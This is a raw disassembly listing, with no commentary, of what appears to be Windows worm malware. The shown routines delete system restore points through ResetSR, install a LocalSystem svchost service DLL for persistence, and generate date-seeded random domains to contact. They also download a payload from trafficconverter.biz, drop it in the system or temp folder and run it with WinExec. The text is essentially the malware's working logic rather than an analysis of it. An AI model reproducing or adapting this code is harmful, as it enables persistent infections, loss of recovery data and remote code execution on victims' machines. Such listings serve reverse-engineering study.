call dword_9A11D4 ; _snprintf
mov esi, dword_9A105C
add esp, 18h
lea eax, [ebp+var_48]
push eax
push ebx
push 2
mov [ebp+var_29], bl
call esi ; dword_9A105C
mov edi, eax
cmp edi, ebx
jz short loc_9A8E66
push edi
call dword_9A1060 ; SetEvent
push edi
call dword_9A10E8 ; CloseHandle
loc_9A8E66: ; CODE XREF: sub_9A8A08+44E�j
mov eax, [ebp+var_4]
mov edx, [ebp+var_20]
lea ecx, [eax+eax*2]
shl ecx, 2
cmp edx, [ebp+ecx+var_C50]
jnz short loc_9A8EEF
mov edx, [ebp+var_1C]
cmp edx, [ebp+ecx+var_C4C]
jnz short loc_9A8EEF
mov edx, [ebp+var_18]
cmp edx, [ebp+ecx+var_C48]
jnz short loc_9A8EEF
push 0Ch
lea eax, [ebp+var_20]
push ebx
push eax
call sub_9B3240 ; memset
push ebx
push dword_9B5608
lea eax, [ebp+var_48]
push dword_9B5604
push offset aW08x08x08x ; "w%08x%08x%08x"
push 20h
push eax
call dword_9A11D4 ; _snprintf
add esp, 24h
lea eax, [ebp+var_48]
push eax
push ebx
push 2
mov [ebp+var_29], bl
call esi ; dword_9A105C
mov esi, eax
cmp esi, ebx
jz short loc_9A8EE0
push esi
call dword_9A1060 ; SetEvent
push esi
call dword_9A10E8 ; CloseHandle
loc_9A8EE0: ; CODE XREF: sub_9A8A08+4C8�j
push ebx
push offset dword_9B5604
call dword_9A1064 ; InterlockedExchange
mov eax, [ebp+var_4]
loc_9A8EEF: ; CODE XREF: sub_9A8A08+471�j
; sub_9A8A08+47D�j ...
mov [ebp+var_14], ebx
loc_9A8EF2: ; CODE XREF: sub_9A8A08+3F5�j
inc eax
cmp eax, [ebp+var_C]
mov [ebp+var_4], eax
jb loc_9A8DC8
loc_9A8EFF: ; CODE XREF: sub_9A8A08+3BA�j
cmp [ebp+var_14], ebx
jnz loc_9A8D91
jmp loc_9A8A29
sub_9A8A08 endp
; =============== S U B R O U T I N E =======================================
sub_9A8F0D proc near ; CODE XREF: sub_9A6847+1B8�p
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push eax
xor eax, eax
push eax
push eax
push offset sub_9A8A08
push eax
push eax
call dword_9A10EC ; CreateThread
push eax
call dword_9A10E8 ; CloseHandle
pop ecx
retn
sub_9A8F0D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8F2C proc near ; CODE XREF: sub_9A927B+84�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 10h
push offset stru_9A16A0
call __SEH_prolog
push offset aSrclient_dll ; "srclient.dll"
call dword_9A1114 ; LoadLibraryA
mov [ebp+var_1C], eax
and [ebp+ms_exc.disabled], 0
test eax, eax
jz short loc_9A8F6E
push offset aResetsr ; "ResetSR"
push eax
call dword_9A1110 ; GetProcAddress
mov [ebp+var_20], eax
test eax, eax
jz short loc_9A8F6E
push 0
call eax
jmp short loc_9A8F6E
; ---------------------------------------------------------------------------
loc_9A8F67: ; DATA XREF: .text:stru_9A16A0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A8F6B: ; DATA XREF: .text:stru_9A16A0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A8F6E: ; CODE XREF: sub_9A8F2C+20�j
; sub_9A8F2C+33�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
push [ebp+var_1C]
call dword_9A1058 ; FreeLibrary
call __SEH_epilog
retn
sub_9A8F2C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8F81 proc near ; CODE XREF: sub_9A9099+1B7�p
var_88 = byte ptr -88h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 88h
push ebx
push esi
push edi
push 1Ah
pop ecx
mov esi, offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
lea edi, [ebp+var_88]
rep movsd
lea eax, [ebp+var_C]
push eax
push 3
xor ebx, ebx
push ebx
lea eax, [ebp+var_88]
push eax
push 80000002h
mov [ebp+var_10], ebx
movsw
call dword_9A1008 ; RegOpenKeyExW
test eax, eax
jnz loc_9A9091
mov esi, dword_9A100C
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_1C]
push eax
push ebx
push [ebp+arg_4]
mov [ebp+var_4], 1
push [ebp+var_C]
mov [ebp+var_1C], 7
call esi ; dword_9A100C
cmp eax, 0EAh
jnz loc_9A9091
push [ebp+arg_0]
mov edi, dword_9A11B0
call edi ; dword_9A11B0
pop ecx
mov ecx, [ebp+var_4]
lea eax, [ecx+eax*2+2]
push eax
push 40h
mov [ebp+var_18], eax
call dword_9A10C0 ; GlobalAlloc
mov ebx, eax
test ebx, ebx
jz short loc_9A9091
lea eax, [ebp+var_4]
push eax
push ebx
lea eax, [ebp+var_14]
push eax
push 0
push [ebp+arg_4]
mov [ebp+var_14], 7
push [ebp+var_C]
call esi ; dword_9A100C
test eax, eax
jnz short loc_9A908A
mov esi, [ebp+var_4]
push [ebp+arg_0]
shr esi, 1
dec esi
call edi ; dword_9A11B0
lea edi, [eax+eax+2]
push edi
push [ebp+arg_0]
add esi, esi
lea eax, [esi+ebx]
push eax
call sub_9B323A ; memcpy
push 2
add esi, edi
push 0
add esi, ebx
push esi
call sub_9B3240 ; memset
add esp, 1Ch
push [ebp+var_18]
push ebx
push 7
push 0
push [ebp+arg_4]
push [ebp+var_C]
call dword_9A1010 ; RegSetValueExW
test eax, eax
jnz short loc_9A908A
mov [ebp+var_10], 1
loc_9A908A: ; CODE XREF: sub_9A8F81+B9�j
; sub_9A8F81+100�j
push ebx
call dword_9A10BC ; GlobalFree
loc_9A9091: ; CODE XREF: sub_9A8F81+3E�j
; sub_9A8F81+72�j ...
mov eax, [ebp+var_10]
pop edi
pop esi
pop ebx
leave
retn
sub_9A8F81 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9099 proc near ; CODE XREF: sub_9A927B+76�p
var_AC = byte ptr -0ACh
var_60 = byte ptr -60h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0ACh
and [ebp+var_14], 0
push ebx
mov ebx, dword_9A11B0
push esi
push edi
push 13h
pop ecx
push [ebp+arg_C]
mov esi, offset aSystemrootSyst ; "%SystemRoot%\\system32\\svchost.exe -k "
lea edi, [ebp+var_AC]
rep movsd
call ebx ; dword_9A11B0
pop ecx
lea eax, [eax+eax+4Ch]
push eax
push 40h
call dword_9A10C0 ; GlobalAlloc
mov esi, eax
test esi, esi
mov [ebp+var_C], esi
jz short loc_9A912B
lea eax, [ebp+var_AC]
push eax
push esi
call dword_9A1198 ; wcscpy
push [ebp+arg_C]
push esi
call dword_9A119C ; wcscat
push 11h
pop ecx
push [ebp+arg_4]
mov esi, offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Services\\"
lea edi, [ebp+var_60]
rep movsd
movsw
call ebx ; dword_9A11B0
add esp, 14h
lea eax, [eax+eax+46h]
push eax
push 40h
call dword_9A10C0 ; GlobalAlloc
mov esi, eax
xor edi, edi
cmp esi, edi
mov [ebp+var_18], esi
jnz short loc_9A9132
push [ebp+var_C]
call dword_9A10BC ; GlobalFree
loc_9A912B: ; CODE XREF: sub_9A9099+40�j
xor eax, eax
jmp loc_9A9276
; ---------------------------------------------------------------------------
loc_9A9132: ; CODE XREF: sub_9A9099+87�j
lea eax, [ebp+var_60]
push eax
push esi
call dword_9A1198 ; wcscpy
push [ebp+arg_4]
push esi
call dword_9A119C ; wcscat
add esp, 10h
push edi
lea eax, [ebp+var_4]
push eax
push edi
push 20006h
push edi
push edi
push edi
push esi
push 80000002h
call dword_9A1004 ; RegCreateKeyExW
test eax, eax
jnz loc_9A9263
push [ebp+arg_8]
call ebx ; dword_9A11B0
mov esi, dword_9A1010
pop ecx
lea eax, [eax+eax+2]
push eax
push [ebp+arg_8]
push 1
push edi
push offset aDisplayname ; "DisplayName"
push [ebp+var_4]
call esi ; dword_9A1010
push 4
lea eax, [ebp+var_8]
push eax
push 4
push edi
push offset aType ; "Type"
push [ebp+var_4]
mov [ebp+var_8], 20h
call esi ; dword_9A1010
push 4
lea eax, [ebp+var_8]
push eax
push 4
push edi
push offset aStart ; "Start"
push [ebp+var_4]
mov [ebp+var_8], 2
call esi ; dword_9A1010
push 4
lea eax, [ebp+var_8]
push eax
push 4
push edi
push offset aErrorcontrol ; "ErrorControl"
push [ebp+var_4]
mov [ebp+var_8], edi
call esi ; dword_9A1010
push [ebp+var_C]
call ebx ; dword_9A11B0
pop ecx
lea eax, [eax+eax+2]
push eax
push [ebp+var_C]
push 2
push edi
push offset aImagepath ; "ImagePath"
push [ebp+var_4]
call esi ; dword_9A1010
push 18h
push offset aLocalsystem ; "LocalSystem"
push 1
push edi
push offset aObjectname ; "ObjectName"
push [ebp+var_4]
call esi ; dword_9A1010
push edi
lea eax, [ebp+var_10]
push eax
push edi
push 20006h
push edi
push edi
push edi
push offset aParameters ; "Parameters"
push [ebp+var_4]
call dword_9A1004 ; RegCreateKeyExW
test eax, eax
jnz short loc_9A925A
push [ebp+arg_0]
call ebx ; dword_9A11B0
pop ecx
lea eax, [eax+eax+2]
push eax
push [ebp+arg_0]
push 2
push edi
push offset aServicedll ; "ServiceDll"
push [ebp+var_10]
call esi ; dword_9A1010
push [ebp+var_10]
call dword_9A101C ; RegCloseKey
push [ebp+arg_C]
push [ebp+arg_4]
call sub_9A8F81
pop ecx
pop ecx
mov [ebp+var_14], eax
loc_9A925A: ; CODE XREF: sub_9A9099+18B�j
push [ebp+var_4]
call dword_9A101C ; RegCloseKey
loc_9A9263: ; CODE XREF: sub_9A9099+CD�j
push [ebp+var_C]
mov esi, dword_9A10BC
call esi ; dword_9A10BC
push [ebp+var_18]
call esi ; dword_9A10BC
mov eax, [ebp+var_14]
loc_9A9276: ; CODE XREF: sub_9A9099+94�j
pop edi
pop esi
pop ebx
leave
retn
sub_9A9099 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A927B proc near ; CODE XREF: sub_9A6847+D9�p
var_208 = byte ptr -208h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 208h
push ebx
push esi
push edi
push [ebp+arg_0]
xor ebx, ebx
call sub_9B322E ; strlen
mov esi, eax
pop ecx
lea eax, [esi+esi+2]
push eax
push 40h
call dword_9A10C0 ; GlobalAlloc
mov edi, eax
test edi, edi
jz short loc_9A930D
call sub_9A7F51
call dword_9A11D8 ; rand
push 5
pop ecx
cdq
idiv ecx
lea eax, [ebp+var_208]
add edx, ecx
push edx
push eax
call sub_9A8022
pop ecx
pop ecx
inc esi
push esi
push edi
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call dword_9A1054 ; MultiByteToWideChar
test eax, eax
jz short loc_9A9304
push offset aNetsvcs ; "netsvcs"
push offset dword_9A1874
lea eax, [ebp+var_208]
push eax
push edi
call sub_9A9099
mov ebx, eax
add esp, 10h
test ebx, ebx
jz short loc_9A9304
call sub_9A8F2C
loc_9A9304: ; CODE XREF: sub_9A927B+62�j
; sub_9A927B+82�j
push edi
call dword_9A10BC ; GlobalFree
mov eax, ebx
loc_9A930D: ; CODE XREF: sub_9A927B+2A�j
pop edi
pop esi
pop ebx
leave
retn
sub_9A927B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9312 proc near ; CODE XREF: sub_9A9427+24�p
var_214 = byte ptr -214h
var_110 = byte ptr -110h
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 214h
mov ecx, [ebp+arg_0]
and [ebp+var_8], 0
test ecx, ecx
jz loc_9A9422
cmp eax, 80h
jbe loc_9A9422
lea edx, [eax-80h]
push edx
push ecx
lea eax, [ecx+eax-80h]
push eax
push dword_9B52D8
mov [ebp+var_C], edx
push offset dword_9B52E0
call sub_9A9E56
add esp, 14h
test al, al
jz loc_9A9422
push ebx
push esi
push edi
mov ebx, 104h
push ebx
lea eax, [ebp+var_110]
push eax
call dword_9A10E0 ; GetSystemDirectoryA
mov esi, dword_9A1048
lea eax, [ebp+var_214]
push eax
push 0
mov edi, offset a0 ; "0"
push edi
lea eax, [ebp+var_110]
push eax
mov [ebp+var_D], 0
call esi ; dword_9A1048
test eax, eax
jnz short loc_9A93C1
lea eax, [ebp+var_110]
push eax
push ebx
call dword_9A104C ; GetTempPathA
lea eax, [ebp+var_214]
push eax
xor ebx, ebx
push ebx
push edi
lea eax, [ebp+var_110]
push eax
mov [ebp+var_D], 0
call esi ; dword_9A1048
jmp short loc_9A93C3
; ---------------------------------------------------------------------------
loc_9A93C1: ; CODE XREF: sub_9A9312+85�j
xor ebx, ebx
loc_9A93C3: ; CODE XREF: sub_9A9312+AD�j
push ebx
push ebx
push 2
push ebx
push 2
push 40000000h
lea eax, [ebp+var_214]
push eax
call dword_9A10D0 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_9A941F
mov edi, [ebp+var_C]
push ebx
lea eax, [ebp+var_4]
push eax
push edi
push [ebp+arg_0]
mov [ebp+var_4], ebx
push esi
call dword_9A1034 ; WriteFile
push esi
call dword_9A10E8 ; CloseHandle
cmp [ebp+var_4], edi
jnz short loc_9A941F
push ebx
lea eax, [ebp+var_214]
push eax
call dword_9A1050 ; WinExec
cmp eax, 1Fh
jbe short loc_9A941F
mov [ebp+var_8], 1
loc_9A941F: ; CODE XREF: sub_9A9312+CF�j
; sub_9A9312+F1�j ...
pop edi
pop esi
pop ebx
loc_9A9422: ; CODE XREF: sub_9A9312+12�j
; sub_9A9312+1D�j ...
mov eax, [ebp+var_8]
leave
retn
sub_9A9312 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9427 proc near ; CODE XREF: sub_9A97BF+30�p
; sub_9A986A+55�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
push edi
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
xor edi, edi
call sub_9A8471
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_9A945A
mov eax, [ebp+var_4]
test eax, eax
jz short loc_9A9453
push esi
call sub_9A9312
pop ecx
mov edi, eax
loc_9A9453: ; CODE XREF: sub_9A9427+21�j
push esi
call dword_9A10BC ; GlobalFree
loc_9A945A: ; CODE XREF: sub_9A9427+1A�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_9A9427 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9460 proc near ; CODE XREF: sub_9A953B+1E�p
var_414 = byte ptr -414h
var_413 = byte ptr -413h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 414h
push ebx
push edi
xor eax, eax
xor ebx, ebx
mov [ebp+var_414], bl
mov ecx, 0FFh
lea edi, [ebp+var_413]
rep stosd
stosw
stosb
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_414]
push eax
push ebx
mov [ebp+var_1], bl
mov [ebp+var_8], 400h
call sub_9B34D2
push ebx
push ebx
push ebx
push ebx
lea eax, [ebp+var_414]
push eax
call dword_9A1230
cmp eax, ebx
mov [ebp+var_10], eax
jz short loc_9A9534
push ebx
push 84080300h
push ebx
push ebx
push [ebp+arg_0]
push eax
call dword_9A1244
mov edi, eax
cmp edi, ebx
jz short loc_9A952B
push esi
mov esi, dword_9A1234
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_14]
push eax
push 20000013h
push edi
mov [ebp+var_C], ebx
mov [ebp+var_8], 4
call esi ; dword_9A1234
test eax, eax
jz short loc_9A9523
cmp [ebp+var_14], 0C8h
jnz short loc_9A9523
mov eax, [ebp+arg_8]
mov [ebp+var_8], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
push [ebp+arg_4]
mov [ebp+var_C], ebx
push 9
push edi
call esi ; dword_9A1234
test eax, eax
jz short loc_9A9523
mov [ebp+var_1], 1
loc_9A9523: ; CODE XREF: sub_9A9460+97�j
; sub_9A9460+A0�j ...
push edi
call dword_9A123C
pop esi
loc_9A952B: ; CODE XREF: sub_9A9460+6E�j
push [ebp+var_10]
call dword_9A123C
loc_9A9534: ; CODE XREF: sub_9A9460+56�j
mov al, [ebp+var_1]
pop edi
pop ebx
leave
retn
sub_9A9460 endp
; =============== S U B R O U T I N E =======================================
sub_9A953B proc near ; CODE XREF: sub_9A961F+4D�p
var_408 = dword ptr -408h
var_404 = dword ptr -404h
var_400 = byte ptr -400h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
sub esp, 408h
push ebp
push 400h
lea eax, [esp+410h+var_400]
push eax
push [esp+414h+arg_0]
xor ebp, ebp
mov [esp+418h+var_404], ebp
call sub_9A9460
add esp, 0Ch
test al, al
jz loc_9A9613
push esi
mov esi, dword_9A118C
push edi
mov edi, offset asc_9A1920 ; ", "
lea eax, [esp+414h+var_400]
push edi
push eax
call esi ; dword_9A118C
test eax, eax
pop ecx
pop ecx
jz loc_9A9611
push edi
push ebp
call esi ; dword_9A118C
cmp eax, ebp
pop ecx
pop ecx
jz short loc_9A9611
push ebx
mov ebx, dword_9A1190
push eax
call ebx ; dword_9A1190
mov ecx, [esp+41Ch+arg_4]
push edi
push ebp
mov [ecx], ax
call esi ; dword_9A118C
mov ebp, eax
add esp, 0Ch
test ebp, ebp
jz short loc_9A9610
and [esp+418h+var_408], 0
loc_9A95B8: ; CODE XREF: sub_9A953B+A1�j
mov eax, [esp+418h+var_408]
push 3
push ebp
push off_9B5378[eax*4]
call dword_9A1194 ; _strnicmp
add esp, 0Ch
test eax, eax
jz short loc_9A95E0
inc [esp+418h+var_408]
cmp [esp+418h+var_408], 0Ch
jb short loc_9A95B8
jmp short loc_9A95EF
; ---------------------------------------------------------------------------
loc_9A95E0: ; CODE XREF: sub_9A953B+96�j
mov eax, [esp+418h+var_408]
mov ecx, [esp+418h+arg_8]
inc eax
mov [ecx], ax
loc_9A95EF: ; CODE XREF: sub_9A953B+A3�j
push edi
push 0
call esi ; dword_9A118C
test eax, eax
pop ecx
pop ecx
jz short loc_9A9610
push eax
call ebx ; dword_9A1190
pop ecx
mov ecx, [esp+418h+arg_C]
mov [ecx], ax
mov [esp+418h+var_404], 1
loc_9A9610: ; CODE XREF: sub_9A953B+76�j
; sub_9A953B+BD�j
pop ebx
loc_9A9611: ; CODE XREF: sub_9A953B+47�j
; sub_9A953B+55�j
pop edi
pop esi
loc_9A9613: ; CODE XREF: sub_9A953B+28�j
mov eax, [esp+40Ch+var_404]
pop ebp
add esp, 408h
retn
sub_9A953B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A961F proc near ; CODE XREF: sub_9A991B+35�p
var_38 = byte ptr -38h
var_19 = byte ptr -19h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = word ptr -0Ch
var_A = word ptr -0Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push 10h
xor ebx, ebx
lea eax, [ebp+var_18]
push ebx
push eax
call sub_9B3240 ; memset
call dword_9A11D8 ; rand
push 6
pop ecx
xor edx, edx
div ecx
lea eax, [ebp+var_38]
push off_9B5360[edx*4]
push offset aHttpWww_S ; "http://www.%s"
push 20h
push eax
call dword_9A11D4 ; _snprintf
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_16]
push eax
lea eax, [ebp+var_12]
push eax
lea eax, [ebp+var_38]
push eax
mov [ebp+var_19], bl
call sub_9A953B
add esp, 2Ch
test eax, eax
jz short loc_9A968A
cmp [ebp+var_12], bx
jz short loc_9A968A
cmp [ebp+var_16], bx
jz short loc_9A968A
cmp [ebp+var_18], bx
jnz short loc_9A96A8
loc_9A968A: ; CODE XREF: sub_9A961F+57�j
; sub_9A961F+5D�j ...
lea eax, [ebp+var_18]
push eax
call dword_9A1040 ; GetSystemTime
mov [ebp+var_14], bx
mov [ebp+var_10], bx
mov [ebp+var_A], bx
mov [ebp+var_E], bx
mov [ebp+var_C], bx
loc_9A96A8: ; CODE XREF: sub_9A961F+69�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push eax
call dword_9A1044 ; SystemTimeToFileTime
push 4
push 63DA5676h
push [ebp+var_4]
push [ebp+var_8]
call __allmul
push 580h
push 28E44000h
push edx
push eax
call __aulldiv
add eax, 0B46A7637h
adc edx, ebx
mov dword ptr dbl_9B53C0, eax
mov dword ptr dbl_9B53C0+4, edx
pop ebx
leave
retn
sub_9A961F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A96EE proc near ; CODE XREF: sub_9A991B+55�p
; sub_9A991B:loc_9A9989�p ...
var_30 = qword ptr -30h
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 20h
mov ecx, dword ptr dbl_9B53C0+4
mov eax, dword ptr dbl_9B53C0
and dword ptr [ebp+var_8], 0
push esi
mov edx, ecx
push edi
mov dword ptr [ebp+var_8+4], edx
mov edi, 7FFFFFFFh
and edx, edi
mov dword ptr [ebp+var_10], eax
mov dword ptr [ebp+var_10+4], edx
fild [ebp+var_10]
mov esi, 80000000h
and dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
and dword ptr [ebp+var_8], 0
mov dword ptr [ebp+var_8+4], ecx
and dword ptr [ebp+var_8+4], esi
fchs
and ecx, edi
faddp st(1), st
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], ecx
push ecx
fstp [ebp+var_10]
push ecx
fild [ebp+var_18]
fild [ebp+var_8]
fchs
faddp st(1), st
fstp [esp+30h+var_30]
call sub_9B332A ; sin
add esp, 8
fstp [ebp+var_20]
push 0
push 64236735h
push dword ptr dbl_9B53C0+4
push dword ptr dbl_9B53C0
call __allmul
and dword ptr [ebp+var_8], 0
mov dword ptr [ebp+var_8+4], edx
and dword ptr [ebp+var_8+4], esi
and edx, edi
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
fild [ebp+var_8]
push ecx
fchs
faddp st(1), st
fadd [ebp+var_20]
fmul [ebp+var_10]
fadd dbl_9A1938
fmul [ebp+var_10]
fstp [ebp+var_20]
fld [ebp+var_10]
fstp [esp+30h+var_30]
call sub_9B3324 ; log
fadd [ebp+var_20]
pop ecx
pop ecx
pop edi
fstp dbl_9B53C0
mov eax, dword ptr dbl_9B53C0
pop esi
leave
retn
sub_9A96EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A97BF proc near ; DATA XREF: sub_9A9818+32�o
var_80 = byte ptr -80h
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 80h
push 7
push dword_9B55F8
lea eax, [ebp+var_80]
push [ebp+arg_0]
push offset aHttpSSearch?qD ; "http://%s/search?q=%d&aq=%d"
push 80h
push eax
call dword_9A11D4 ; _snprintf
lea eax, [ebp+var_80]
push eax
mov [ebp+var_1], 0
call sub_9A9427
add esp, 1Ch
test eax, eax
jz short loc_9A9808
push 1
push offset dword_9B5610
call dword_9A1064 ; InterlockedExchange
loc_9A9808: ; CODE XREF: sub_9A97BF+3A�j
push [ebp+arg_0]
call dword_9A11D0 ; free
pop ecx
xor eax, eax
leave
retn 4
sub_9A97BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9818 proc near ; DATA XREF: sub_9A991B+107�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push esi
call dword_9A127C ; gethostbyname
test eax, eax
jz short loc_9A9860
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call dword_9A1288 ; inet_ntoa
test eax, eax
jz short loc_9A9860
lea ecx, [ebp+arg_0]
push ecx
push 0
push eax
call dword_9A11CC ; _strdup
pop ecx
push eax
push offset sub_9A97BF
push 0
push 0
call dword_9A10EC ; CreateThread
push eax
call dword_9A10E8 ; CloseHandle
loc_9A9860: ; CODE XREF: sub_9A9818+10�j
; sub_9A9818+21�j
mov byte ptr [esi], 0
xor eax, eax
pop esi
pop ebp
retn 4
sub_9A9818 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A986A proc near ; DATA XREF: sub_9A98FC+9�o
var_14 = word ptr -14h
var_12 = word ptr -12h
var_E = word ptr -0Eh
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
mov esi, dword_9A1240
xor ebx, ebx
push edi
mov edi, dword_9A10C4
inc ebx
loc_9A9882: ; CODE XREF: sub_9A986A+87�j
lea eax, [ebp+var_14]
push eax
call dword_9A1040 ; GetSystemTime
cmp [ebp+var_14], 7D8h
ja short loc_9A98DF
cmp [ebp+var_12], 0Ch
ja short loc_9A98DF
cmp [ebp+var_E], 1
ja short loc_9A98DF
push 36EE80h
call edi ; dword_9A10C4
jmp short loc_9A98EF
; ---------------------------------------------------------------------------
loc_9A98AB: ; CODE XREF: sub_9A986A+7F�j
push offset aHttpTrafficcon ; "http://trafficconverter.biz"
call sub_9A85C8
test eax, eax
pop ecx
jz short loc_9A98C9
push offset aHttpTrafficc_0 ; "http://trafficconverter.biz/4vir/antisp"...
call sub_9A9427
test eax, eax
pop ecx
jnz short loc_9A98ED
loc_9A98C9: ; CODE XREF: sub_9A986A+4E�j
mov eax, [ebp+var_4]
and al, 1
neg al
sbb eax, eax
and eax, 2710h
add eax, 1388h
push eax
call edi ; dword_9A10C4
loc_9A98DF: ; CODE XREF: sub_9A986A+28�j
; sub_9A986A+2F�j ...
lea eax, [ebp+var_4]
push 0
push eax
call esi ; dword_9A1240
test eax, eax
jnz short loc_9A98AB
jmp short loc_9A98EF
; ---------------------------------------------------------------------------
loc_9A98ED: ; CODE XREF: sub_9A986A+5D�j
xor ebx, ebx
loc_9A98EF: ; CODE XREF: sub_9A986A+3F�j
; sub_9A986A+81�j
test ebx, ebx
jnz short loc_9A9882
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_9A986A endp
; =============== S U B R O U T I N E =======================================
sub_9A98FC proc near ; CODE XREF: sub_9A6847+1CA�p
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push eax
xor eax, eax
push eax
push eax
push offset sub_9A986A
push eax
push eax
call dword_9A10EC ; CreateThread
push eax
call dword_9A10E8 ; CloseHandle
pop ecx
retn
sub_9A98FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A991B proc near ; CODE XREF: sub_9A6847+1DE�p
var_454 = dword ptr -454h
var_6C = dword ptr -6Ch
var_44 = dword ptr -44h
var_1C = byte ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_12 = word ptr -12h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 454h
lea eax, [ebp+var_18]
push eax
call dword_9A1040 ; GetSystemTime
cmp [ebp+var_18], 7D8h
ja short loc_9A9948
cmp [ebp+var_16], 0Bh
ja short loc_9A9948
cmp [ebp+var_12], 19h
jbe locret_9A9AC1
loc_9A9948: ; CODE XREF: sub_9A991B+19�j
; sub_9A991B+20�j
push ebx
push esi
push edi
call sub_9A7F51
call sub_9A961F
xor ebx, ebx
mov dword_9B5610, ebx
loc_9A995D: ; CODE XREF: sub_9A991B+B7�j
push 20h
push 40h
call dword_9A10C0 ; GlobalAlloc
mov edi, eax
mov [ebp+ebx*4+var_454], edi
call sub_9A96EE
push 4
cdq
pop ecx
idiv ecx
mov [ebp+var_4], 0
mov esi, edx
add esi, 8
jz short loc_9A99AC
loc_9A9989: ; CODE XREF: sub_9A991B+8F�j
call sub_9A96EE
push eax
call sub_9B3330 ; labs
pop ecx
cdq
push 1Ah
pop ecx
idiv ecx
mov eax, [ebp+var_4]
add dl, 61h
inc [ebp+var_4]
cmp [ebp+var_4], esi
mov [eax+edi], dl
jb short loc_9A9989
loc_9A99AC: ; CODE XREF: sub_9A991B+6C�j
mov byte ptr [edi+esi], 0
call sub_9A96EE
push 5
pop ecx
xor edx, edx
div ecx
push off_9B53A8[edx*4]
push edi
call sub_9B3336 ; strcat
inc ebx
cmp ebx, 0FAh
pop ecx
pop ecx
jl short loc_9A995D
mov [ebp+var_8], 1
loc_9A99DB: ; CODE XREF: sub_9A991B+185�j
xor ebx, ebx
cmp dword_9B5610, ebx
jnz loc_9A9AA6
mov [ebp+var_4], ebx
xor esi, esi
loc_9A99EE: ; CODE XREF: sub_9A991B+ED�j
; sub_9A991B+FF�j ...
call dword_9A11D8 ; rand
cdq
